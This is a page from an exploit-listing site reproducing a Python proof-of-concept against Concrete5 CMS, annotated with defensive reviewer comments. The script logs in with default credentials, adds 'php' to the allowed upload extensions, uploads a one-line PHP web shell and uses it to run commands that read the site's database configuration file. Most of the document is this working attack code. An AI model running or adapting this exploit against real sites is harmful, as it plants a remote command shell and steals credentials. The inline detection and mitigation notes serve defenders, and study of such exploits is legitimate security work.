





Concrete5 Proof Of Concept Shell Upload

CVE Category Price Severity
CWE-434 Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2017-05-31
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050234

Below is a copy:

Concrete5 Proof Of Concept Shell Upload

c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
#   created 29.04.2017. Bug ('feature') is exploitable only
#   when you have valid credentials.
#
# Reviewer notes (defensive reading of this PoC):
#   Weakness class CWE-434 (upload of a file with a dangerous type). The
#   script demonstrates that an already-authenticated account can edit the
#   dashboard's "file access file types" allow-list to include "php", after
#   which the ordinary file-manager upload accepts a .php file. The file is
#   then requested under /application/files/ with a command in a query
#   parameter; that final step only works if the web server executes PHP
#   from the uploads directory.
#   Python 2 syntax throughout (print statements, raw_input); depends on the
#   third-party `requests` package. Detection and mitigation points are
#   called out inline below.
import sys
import re
import requests

# Host is taken verbatim from the prompt and used as a URL prefix; the
# search regex further down assumes the site answers over plain http.
target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
session = requests.session()

initreq = session.get(logMe)
initresp = initreq.text

# Hidden form token (presumably the per-page CSRF token) scraped from the
# login page; the same pattern is reused for every later form.
gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)

if found:
  token = found.group(1)
  print '[+] Found token: ' + str(token)


  # assuming token is valid, let's log in
  # Hard-coded credentials: the PoC presupposes a valid login (see header).
  # Mitigation: never leave stack/default credentials in place; enforce
  # unique, strong passwords for any account with dashboard access.
  login_data = {
        'uName':'user',
        'uPassword':'bitnami',
        'ccm_token':token
  }
  loglink = target + '/index.php/login/authenticate/concrete'
  loginreq = session.post(loglink, data=login_data)

  #afterlogin = target + '/index.php/dashboard/system'
  # The file-types dashboard page holds the allowed-extension list; reaching
  # it is the precondition for everything that follows. Note that nothing
  # checks the result of loginreq, so the "logged-in" message below is
  # printed unconditionally.
  afterlogin = target + '/index.php/dashboard/system/files/filetypes'
  nextreq1 = session.get(afterlogin)
  nextresp1 = nextreq1.text
  print '[+] Cool, we\'re logged-in!'
  #print afterlogin
  #print nextresp1
  print '[+] We are ready to go, extension-page is available.'
  print ''

  # construct POST with new.ext
  newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
  foundToken = re.search(newToken, nextresp1)

  if foundToken:
    newOne = foundToken.group(1)
    print '[+] New token grabbed: ' + str(newOne)

    # Core of the weakness: one POST replaces the whole allow-list, and the
    # application accepts "php" in it. Detection: audit/alert on POSTs to the
    # file_access_extensions path and on any change to this setting that adds
    # script extensions. Mitigation: keep executable extensions out of the
    # list server-side and deny script execution in the uploads directory at
    # the web-server layer so the setting alone cannot grant code execution.
    data_ext = {
        'ccm_token':newOne,
        'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
    }
    datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
    datareq = session.post(datalink, data=data_ext)
    dataresp = datareq.text
    # Confirms the change by reading the textarea back from the response.
    nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
    newexts = re.search(nowwecan, dataresp)

    if newexts:
      print '[+] Available now: '+  newexts.group(1)

      print '[+] Time to upload shell...'

      # next token to upload request
      nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
      tokreq3 = session.get(nextTokenUrl)
      tokresp3 = tokreq3.text

      grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
      foundit = re.search(grabNextTok, tokresp3)

      if foundit:
        tokentoup = foundit.group(1)
        print '[+] Next token (3rd): ' + str( tokentoup )

      # we are logged-in; preparing req to upload shell
      # A one-line PHP command-execution payload is written to the local
      # working directory and is not removed afterwards. The filename below
      # (and the xx query parameter used later) are the page's own indicators
      # for this PoC.
      saymyname = 'meshell3.php'

      fp = open(saymyname,'w')
      fp.write('<?php system($_GET["xx"]);')
      fp.close()

      # tmpshfile ready, do req now
      # Upload goes through the standard file-manager endpoint; success is
      # inferred solely from the filename echoing back in the response body.
      up_files = { 'file':open(saymyname,'rb') }

      up_params = {
          'ccm_token':tokentoup,
          'filename':saymyname,
          'currentFolder':'0'
      }
      upreqlink = target + '/index.php/ccm/system/file/upload'
      upreqnow = session.post(upreqlink, files=up_files, data=up_params)
      upresp = upreqnow.text
      if saymyname in upresp:
        print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'

        # The file search page and the properties dialog are used only to
        # recover the numeric file ID and then the on-disk path under
        # /application/files/, which is what makes the upload reachable
        # over HTTP.
        searchme = target + '/index.php/dashboard/files/search'
        dosearch = session.get(searchme)
        meresp = dosearch.text

        searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
        foundShLink = re.search(searchShLink, meresp)

        if foundShLink:
          foundId = foundShLink.group(3)
          shid = foundId.strip('\/')
          print '[+] Found link ID:' + str(shid)

          preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
          prepreq = session.get(preparingProp)
          prepresp = prepreq.text
          whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
          whereareu = re.compile(whereareutxt)
          foundme2 = re.search(whereareu, prepresp)

          if foundme2:
            print '[+] Shell is ready to use:'
            # Final request: the command travels in the xx query string and
            # the response body is printed. Detection: GETs for *.php under
            # /application/files/, especially with a query string, and PHP
            # worker processes spawning shells from the uploads path.
            # Mitigation: a web-server rule that refuses to execute scripts
            # under application/files/ breaks this step regardless of the
            # allow-list setting.
            shellshere =  target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
            print '       ' + shellshere

            print '[+] "Finish him!" ;7'
            finish = session.get(shellshere)
            fintxt = finish.text
            print '[+] Response:'
            print fintxt
            print '\n---------------'

      else:
        print  '[-] I can not upload our shell. Verify!'


